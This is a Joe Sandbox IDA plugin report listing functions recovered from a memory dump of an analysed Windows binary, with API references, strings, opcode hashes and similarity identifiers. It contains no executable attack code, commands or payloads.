Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: a370c127f7d6e68925e5e6f353acb8e453cb7dfd3c512b1f4417b00b85d8f9a3
Instruction ID: 118ae46ea60e719deb04aa32fae1483a37018460ac49c481b7d9bafaf59c6af2
Opcode Fuzzy Hash: a370c127f7d6e68925e5e6f353acb8e453cb7dfd3c512b1f4417b00b85d8f9a3
Instruction Fuzzy Hash: DC62E1A6F1C662C5FB01BB75D8442BDA321BB867A5F904231DA2D57AD6DFBCE084C310

Function 00007FF741EAF180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF741EB0528

Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB67
Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB80

Part of subcall function 00007FF741EBB0DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF741EB0429), ref: 00007FF741EBB110
Part of subcall function 00007FF741EBB0DC: SetLastError.KERNEL32 ref: 00007FF741EBB153

Part of subcall function 00007FF741E9129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB0490
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB0496
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB049C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB04F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB0532
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB0538

Strings

%s: %s, xrefs: 00007FF741EAFC11
%ls, xrefs: 00007FF741EAF3AC, 00007FF741EAF3FF

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 2539828978-2259941744
Opcode ID: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
Instruction ID: 67e46bb44fb11235547acfc625a957b57752e98ec057bc8e65c68af47edc5e53
Opcode Fuzzy Hash: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
Instruction Fuzzy Hash: FFB28366A1C692C1EB12FB65D4541BEE361BFCA7D1F904336E69D036E6EEACE140C310

Function 00007FF741ED2550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ED2C12
memcpy_s.LIBCMT ref: 00007FF741ED35BF
memcpy_s.LIBCMT ref: 00007FF741ED3666

Part of subcall function 00007FF741ED38BC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF741ED38EE

memcpy_s.LIBCMT ref: 00007FF741ED372F

Part of subcall function 00007FF741ECD008: _invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECD02D

Strings

1#QNAN, xrefs: 00007FF741ED37E8
1#IND, xrefs: 00007FF741ED37AA
1#INF, xrefs: 00007FF741ED3807
1#SNAN, xrefs: 00007FF741ED37C9

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction ID: 91f9a8a4563878046e28906b54d137bb698681de17c906ba567c1a9ccb07e482
Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction Fuzzy Hash: FFB229BAE0C1A3CAE726BE24C5406FDA7A1FB44389F885135DA2A57B85DF7CE504C710

Function 00007FF741EA1A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF741EA1A97
GetLongPathNameW.KERNEL32 ref: 00007FF741EA1AE0
GetShortPathNameW.KERNEL32 ref: 00007FF741EA1B21
GetShortPathNameW.KERNEL32 ref: 00007FF741EA1B6A

Part of subcall function 00007FF741EB13C4: CompareStringW.KERNEL32 ref: 00007FF741EB13E3

MoveFileW.KERNEL32 ref: 00007FF741EA1DFE
MoveFileW.KERNEL32 ref: 00007FF741EA1E65

Part of subcall function 00007FF741EA2134: CreateFileW.KERNEL32 ref: 00007FF741EA223C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1FE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1FE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1FED

Strings

rtmp, xrefs: 00007FF741EA1CF4, 00007FF741EA1D03

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: d56d65f6e3d64a94564ebbd928e94f8f211499ec6bfe88100997fab12f3fd8ee
Instruction ID: 613f06515f0e59989389e90f8cc9f1223f60811e4dc62d92c7b6ef93388144a9
Opcode Fuzzy Hash: d56d65f6e3d64a94564ebbd928e94f8f211499ec6bfe88100997fab12f3fd8ee
Instruction Fuzzy Hash: EAF1F226B1CA92C1EB01FB65E8801FDA7A1FB957D5F901132EA4D43AA9DFBCD484C350

Function 00007FF741EA5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF741EA5BC2
GetFullPathNameW.KERNEL32 ref: 00007FF741EA5C0E
GetFullPathNameW.KERNEL32 ref: 00007FF741EA5D2B
GetFullPathNameW.KERNEL32 ref: 00007FF741EA5D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA5EE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA5EE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA5EEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA5EF2

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
Instruction ID: 559ce4cdd7939c9d52e4692524cc78b3db823c4558b871afd50eb6cef0f1073c
Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
Instruction Fuzzy Hash: 96A1AF66F18A62C4FF05BB7998441BCA361BF49BE5B948235DE2D17BC9DEBCE041C210

Function 00007FF741EC3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF741EC318C
RtlCaptureContext.KERNEL32 ref: 00007FF741EC31B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF741EC31D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF741EC3214
IsDebuggerPresent.KERNEL32 ref: 00007FF741EC3268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF741EC3289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF741EC3294

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction ID: 5c1d4e24b7d1903b559fba90d17d74d9095e08f838f49dea7ae2c3284842485a
Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction Fuzzy Hash: D8318E76608B92CAEB61BF60E8507EDB370FB84745F844039DA4D43A98EF78D548C720

Function 00007FF741EC76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF741EC7751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF741EC7769
RtlVirtualUnwind.KERNEL32 ref: 00007FF741EC77A4
IsDebuggerPresent.KERNEL32 ref: 00007FF741EC77DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF741EC77E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF741EC77F2

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: 8af3a9e5017f66d6b08098b0efbbc7d903316f474acbbfdcba98a29f9fbbd381
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: 5331923A608B91C6DB21BF25EC406AEB3A0FB88755F940135EA9D43B59EF7CC145C710

Function 00007FF741E91AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91EBB

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
Instruction ID: d2cce56503666ca2717a721865843380f95c4dd8eb3cbbbb6242b367eec8a617
Opcode Fuzzy Hash: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
Instruction Fuzzy Hash: 87B1E56AB287A6D5EB12BB25D8402EDA361FF86795F800131EA5C07BD5EFBCD540C310

Function 00007FF741ECFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECFAC4

Part of subcall function 00007FF741EC7934: GetCurrentProcess.KERNEL32(00007FF741ED0CCD), ref: 00007FF741EC7961

Strings

*?, xrefs: 00007FF741ECFAEB
., xrefs: 00007FF741ECFEE4

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: dc7936077dadfb81f0003df1e48b5cf56fece7e7576a520f41acc93517fe3ebb
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 8F51D46AF18A6581EB16FF62D8104F9A3A4FB48BD9B844531DE1E17B84EFBCD441C310

Function 00007FF741ED2080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF741ED210B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: 72531c675866d81918e2859aac4b0b6c64525f5b2b620fa643fdaf9558fbe48a
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: F5D1C036B1C293C7EB25FF15E18466AB7A1FB98785F888134DB5A53B45CA3CE8418B10

Function 00007FF741EB8DF4 Relevance: 4.7, APIs: 3, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EB85E0: GetDC.USER32 ref: 00007FF741EB85EC
Part of subcall function 00007FF741EB85E0: GetDeviceCaps.GDI32 ref: 00007FF741EB85FD
Part of subcall function 00007FF741EB85E0: ReleaseDC.USER32 ref: 00007FF741EB860A

GetObjectW.GDI32 ref: 00007FF741EB8E48

Part of subcall function 00007FF741EB90B0: GetDC.USER32 ref: 00007FF741EB90D9
Part of subcall function 00007FF741EB90B0: GetObjectW.GDI32 ref: 00007FF741EB9107
Part of subcall function 00007FF741EB90B0: ReleaseDC.USER32 ref: 00007FF741EB91BB

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction ID: 5be96cfd390bf04aa9c9f4b2fcbe5edecd0686cf18175a442423ebdabc9ef12f
Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
Instruction Fuzzy Hash: 91813D3AB08A26C6EB11FF6AD840AACB771FB84B89F844122DE0D57768DF78D545C350

Function 00007FF741E9B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF741E9BA9D), ref: 00007FF741E9B6E5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF741E9BA9D), ref: 00007FF741E9B719
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF741E9BA9D), ref: 00007FF741E9B743

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction ID: bc7051bb25c8f8578777f7cfc36cf4fe561068cb2a064d2918c876dbc9aa6418
Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction Fuzzy Hash: 52014F7961C752C2EB11BF22B85057AA392FB8ABC2F884134EA8D47B45CF7CD5058714

Function 00007FF741ECFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF741ECFEE4

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction ID: 95a4a7389f56bd6415e2023b084d897eacdd8397efefbf4ed56bb669482d9c30
Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction Fuzzy Hash: 84310A26B0C6A189E721BA269C047A9EA91BB54FE4F848235EE6D07BC5DF7CD501C700

Function 00007FF741ED5AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF741ED5D45
RaiseException.KERNEL32 ref: 00007FF741ED5D56

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction ID: c5ff4f67bfa457aaaa4b220e56b6028baf27e2c3f7e7f3709c2223f028730c88
Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
Instruction Fuzzy Hash: 92B1AE37604B95CBEB1AEF29C84636C7BB0FB44B49F188921DA6D837A4CB79D451C710

Function 00007FF741EBA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF741EBA315
GetNumberFormatW.KERNEL32 ref: 00007FF741EBA371

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction ID: 72405f7f45b4f425f7a908d146501e10f63c4392be64d388e63c8dbe2a7839f6
